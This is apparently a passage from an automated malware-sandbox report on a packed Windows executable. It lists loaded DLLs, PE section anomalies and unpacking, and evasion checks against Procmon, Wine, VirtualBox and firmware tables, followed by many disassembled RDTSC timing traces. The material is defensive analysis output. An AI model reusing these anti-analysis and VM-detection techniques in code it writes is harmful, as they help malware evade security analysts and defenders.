              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic file information: File size 3029504 > 1048576
              Source: file.exeStatic PE information: Raw size of fvanlhxn is bigger than: 0x100000 < 0x2b8400

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.490000.0.unpack :EW;.rsrc :W;.idata :W;fvanlhxn:EW;vsjzakbl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;fvanlhxn:EW;vsjzakbl:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x2eed66 should be: 0x2eed27
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name: fvanlhxn
              Source: file.exeStatic PE information: section name: vsjzakbl
              Source: file.exeStatic PE information: section name: .taggant
              Source: file.exeStatic PE information: section name: entropy: 7.978933020723451

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF639 second address: 4EF643 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC714E8FEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF643 second address: 4EEE8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC714E98426h 0x00000009 jmp 00007FC714E9842Dh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 je 00007FC714E9842Dh 0x0000001a pushad 0x0000001b sbb di, B567h 0x00000020 popad 0x00000021 push dword ptr [ebp+122D0CA9h] 0x00000027 mov dword ptr [ebp+122D1CAEh], edi 0x0000002d call dword ptr [ebp+122D1D52h] 0x00000033 pushad 0x00000034 jmp 00007FC714E98430h 0x00000039 xor eax, eax 0x0000003b xor dword ptr [ebp+122D1CB3h], ebx 0x00000041 ja 00007FC714E9842Ch 0x00000047 mov edx, dword ptr [esp+28h] 0x0000004b jmp 00007FC714E9842Eh 0x00000050 mov dword ptr [ebp+122D2BCBh], eax 0x00000056 mov dword ptr [ebp+122D265Bh], eax 0x0000005c mov esi, 0000003Ch 0x00000061 mov dword ptr [ebp+122D265Bh], edx 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b jbe 00007FC714E9842Ch 0x00000071 mov dword ptr [ebp+122D1F71h], edx 0x00000077 lodsw 0x00000079 mov dword ptr [ebp+122D1CB3h], ecx 0x0000007f add eax, dword ptr [esp+24h] 0x00000083 mov dword ptr [ebp+122D247Eh], eax 0x00000089 mov ebx, dword ptr [esp+24h] 0x0000008d jmp 00007FC714E9842Fh 0x00000092 nop 0x00000093 push eax 0x00000094 push edx 0x00000095 push ebx 0x00000096 push edi 0x00000097 pop edi 0x00000098 pop ebx 0x00000099 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C62C second address: 66C65E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEFh 0x00000007 jmp 00007FC714E8FEEDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC714E8FEF0h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6784D7 second address: 6784DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6784DB second address: 6784E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6784E4 second address: 6784EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6784EC second address: 6784F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FC714E8FEEEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6784F9 second address: 678525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007FC714E98432h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FC714E9842Ah 0x00000015 jmp 00007FC714E9842Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678525 second address: 678529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678529 second address: 67852D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67868A second address: 67869A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC714E8FEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6787BB second address: 6787DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC714E98432h 0x00000008 jl 00007FC714E98426h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6787DB second address: 6787E1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6787E1 second address: 678821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC714E98438h 0x0000000f js 00007FC714E9843Eh 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FC714E98436h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678821 second address: 67882D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC714E8FEE6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 678996 second address: 6789A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6789A0 second address: 6789C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC714E8FEF2h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6789C7 second address: 6789CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A5CC second address: 67A5FB instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC714E8FEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push ecx 0x0000000f jmp 00007FC714E8FEEFh 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC714E8FEEEh 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A5FB second address: 67A618 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC714E98426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC714E9842Ch 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A618 second address: 67A6C6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC714E8FEECh 0x00000008 jc 00007FC714E8FEE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FC714E8FEE8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b sub dword ptr [ebp+122D1D6Ch], edx 0x00000031 push 00000003h 0x00000033 pushad 0x00000034 call 00007FC714E8FEEFh 0x00000039 push esi 0x0000003a pop ebx 0x0000003b pop esi 0x0000003c je 00007FC714E8FEECh 0x00000042 ja 00007FC714E8FEE6h 0x00000048 popad 0x00000049 mov dword ptr [ebp+122D25ACh], edx 0x0000004f push 00000000h 0x00000051 mov dx, 0BF6h 0x00000055 push 00000003h 0x00000057 mov esi, dword ptr [ebp+122D2D17h] 0x0000005d call 00007FC714E8FEE9h 0x00000062 jno 00007FC714E8FEF2h 0x00000068 push eax 0x00000069 jnp 00007FC714E8FF06h 0x0000006f pushad 0x00000070 jmp 00007FC714E8FEF8h 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A6C6 second address: 67A6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a jmp 00007FC714E98438h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A6EB second address: 67A6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A6FB second address: 67A6FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A6FF second address: 67A709 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC714E8FEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A709 second address: 67A771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC714E98434h 0x00000008 jmp 00007FC714E9842Dh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007FC714E98437h 0x00000019 pop eax 0x0000001a push edx 0x0000001b xor dl, FFFFFFD6h 0x0000001e pop esi 0x0000001f lea ebx, dword ptr [ebp+1245F43Ah] 0x00000025 ja 00007FC714E98426h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push edi 0x00000030 pop edi 0x00000031 jmp 00007FC714E9842Dh 0x00000036 popad 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A85A second address: 67A85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A85E second address: 67A862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A9B4 second address: 67AA32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 42D468FDh 0x00000011 mov esi, eax 0x00000013 mov dx, di 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D22DCh], eax 0x0000001e push 00000000h 0x00000020 call 00007FC714E8FEF4h 0x00000025 jl 00007FC714E8FEECh 0x0000002b mov dword ptr [ebp+122D1D15h], edi 0x00000031 pop ecx 0x00000032 push 00000003h 0x00000034 jnc 00007FC714E8FEECh 0x0000003a sub dword ptr [ebp+122D1D15h], esi 0x00000040 mov esi, 3C1CDAF5h 0x00000045 push CEC41694h 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FC714E8FEF9h 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AA32 second address: 67AA42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AA42 second address: 67AA7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 0EC41694h 0x00000010 and dx, 6D9Dh 0x00000015 lea ebx, dword ptr [ebp+1245F44Eh] 0x0000001b or dword ptr [ebp+122D2683h], ecx 0x00000021 mov dword ptr [ebp+122D269Ah], edi 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AA7B second address: 67AA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AA7F second address: 67AA9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AA9A second address: 67AAA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67AAA0 second address: 67AAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BFDD second address: 69C004 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC714E98428h 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FC714E98439h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69C004 second address: 69C008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663EB0 second address: 663EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663EBC second address: 663EC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663EC2 second address: 663ECD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FC714E98426h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A108 second address: 69A10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A10E second address: 69A113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A113 second address: 69A118 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A3E8 second address: 69A3F2 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC714E9842Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A3F2 second address: 69A3FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A3FA second address: 69A3FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A533 second address: 69A53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A53E second address: 69A544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A9C7 second address: 69A9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC714E8FEE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A9D3 second address: 69A9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69AB23 second address: 69AB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69AB29 second address: 69AB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007FC714E9842Bh 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop esi 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69AB3F second address: 69AB51 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC714E8FEE8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FC714E8FEE6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69AF8B second address: 69AF95 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC714E9842Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69AF95 second address: 69AFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007FC714E8FEF2h 0x0000000c jnl 00007FC714E8FEE6h 0x00000012 je 00007FC714E8FEE6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007FC714E8FEEFh 0x00000022 jp 00007FC714E8FEE6h 0x00000028 popad 0x00000029 jl 00007FC714E8FEF2h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69AFD0 second address: 69AFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69AFD6 second address: 69AFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69AFDA second address: 69AFDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69AFDF second address: 69AFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69B84F second address: 69B855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69B855 second address: 69B8A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC714E8FEF8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jo 00007FC714E8FEE6h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007FC714E8FEF3h 0x00000019 push edi 0x0000001a jnc 00007FC714E8FEE6h 0x00000020 pop edi 0x00000021 push edi 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 pop edi 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BB56 second address: 69BB66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FC714E9842Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BE14 second address: 69BE19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BE19 second address: 69BE21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FCA2 second address: 69FCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A13C9 second address: 6A13CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A13CD second address: 6A1404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC714E8FEF5h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC714E8FEF6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1404 second address: 6A1418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a js 00007FC714E98434h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A26D4 second address: 6A2717 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEF6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC714E8FEF4h 0x0000000e jmp 00007FC714E8FEF5h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A2717 second address: 6A271B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65EC78 second address: 65EC7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6236 second address: 6A623C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A623C second address: 6A6240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6240 second address: 6A6244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6390 second address: 6A639F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jne 00007FC714E8FEEAh 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
